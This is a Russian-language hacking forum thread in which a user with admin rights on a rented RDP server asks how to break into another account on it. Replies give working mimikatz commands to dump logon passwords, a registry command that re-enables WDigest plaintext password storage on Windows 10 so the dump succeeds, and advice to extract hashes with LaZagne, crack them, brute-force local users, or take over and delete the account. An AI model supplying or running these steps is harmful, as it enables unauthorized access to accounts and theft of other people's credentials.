Купить дедик, RDP, сервер

[Вопрос]Как можно зайти на другие учётки

Mongoler

Проверенный
Регистрация
27 Фев 2019
Сообщения
25
Реакции
17
Депозит
0 BTC
Всем привет, у меня есть RDP и там есть 3 учётки, одна моя (админ), а так есть другая учётка на которой майнят, каким способом можно взломать учётку? И да на дедике стоит windows 10, если бы не она, то я бы не искал помощи.
 
  • Like
Реакции: BTC

timboleik

Legendary
Регистрация
30 Авг 2018
Сообщения
153
Реакции
81
Депозит
0 BTC
Всем привет, у меня есть RDP и там есть 3 учётки, одна моя (админ), а так есть другая учётка на которой майнят, каким способом можно взломать учётку? И да на дедике стоит windows 10, если бы не она, то я бы не искал помощи.
mimikatz есть такой софт,ищет пароли других учеток,на этот софт орут почти все антивири,имей ввиду что на дедике любой антивирь его сразу сожрут,и еще без админ прав вроде как не ищет учетки

Вот команды которые нужно ввести в окно программы

privilege::debug

log c:\passwords.txt

sekurlsa::logonpasswords

нет гарантии что 100% у тебя получится
 
  • Like
Реакции: BTC

Mongoler

Проверенный
Регистрация
27 Фев 2019
Сообщения
25
Реакции
17
Депозит
0 BTC
Спасибо
mimikatz есть такой софт,ищет пароли других учеток,на этот софт орут почти все антивири,имей ввиду что на дедике любой антивирь его сразу сожрут,и еще без админ прав вроде как не ищет учетки

Вот команды которые нужно ввести в окно программы

privilege::debug

log c:\passwords.txt

sekurlsa::logonpasswords

нет гарантии что 100% у тебя получится
Спасибо конечно, но этот софт у меня есть, он очень хорошо работает на windows 7 и ниже, в 10 же он не так хорошо, так как в ней пароли находятся не
 

arthacker

МЕСТНЫЙ
Регистрация
6 Апр 2018
Сообщения
107
Реакции
35
Депозит
0 BTC
Спасибо

Спасибо конечно, но этот софт у меня есть, он очень хорошо работает на windows 7 и ниже, в 10 же он не так хорошо, так как в ней пароли находятся не
Просто ты мат. часть не учил, в windows 8 и выше по умолчанию отключено сохранение паролей, что нужно сделать, запускаем командную строку от имени админа и вставляем
Код:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
После перезагрузки пароли будут сохранятся так же как на вин 7
 

Mongoler

Проверенный
Регистрация
27 Фев 2019
Сообщения
25
Реакции
17
Депозит
0 BTC
Просто ты мат. часть не учил, в windows 8 и выше по умолчанию отключено сохранение паролей, что нужно сделать, запускаем командную строку от имени админа и вставляем
Код:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
После перезагрузки пароли будут сохранятся так же как на вин 7
Спасибо
 

Brutello

МЕСТНЫЙ
Регистрация
10 Апр 2019
Сообщения
79
Реакции
40
Депозит
0 BTC
Если ты там админ, че пароль ему не сменишь? И потом зайдешь.
 

delf

Проверенный
Регистрация
22 Ноя 2018
Сообщения
21
Реакции
15
Депозит
0 BTC
как вариант достать хеши пароля Лазаньей и попытаться взломать Овчаркой
 

utyara

МЕСТНЫЙ
Регистрация
3 Янв 2019
Сообщения
107
Реакции
33
Депозит
0 BTC

HUKSI

МЕСТНЫЙ
Регистрация
11 Окт 2019
Сообщения
89
Реакции
104
Депозит
0 BTC
Для всех дампов нужны админ права,если у тебя их нет,можешь побрутить локальных пользователей и если пароли слабые,то взломаешь.
Ну... а если есть админ права,то смени пароль,зайди посмотри что да как там,а потом удали его учетку
 

mika3407

Проверенный
Регистрация
1 Дек 2019
Сообщения
6
Реакции
0
Депозит
0 BTC
Через реестр можно выдернуть пароли, если под адм сижу?
 

Mr. Brains

VIP Person
Регистрация
13 Дек 2020
Сообщения
8
Реакции
12
Депозит
0 BTC
Тренируйтесь. Предупреждаю, данный способ не работает для подключения к дедикам под управлением Windows ниже 7/Windows Server 2008 R2, а также домашних редакций Windows, потому что на последних нельзя задействовать NLA. Но это не точно, мне просто лень заморачиваться. И да, нельзя залогиниться под учётными записями, не входящими в группу "Администраторы". Но в чём проблема временно добавить эти учётные записи в вышеупомянутую группу?!

 
Последнее редактирование: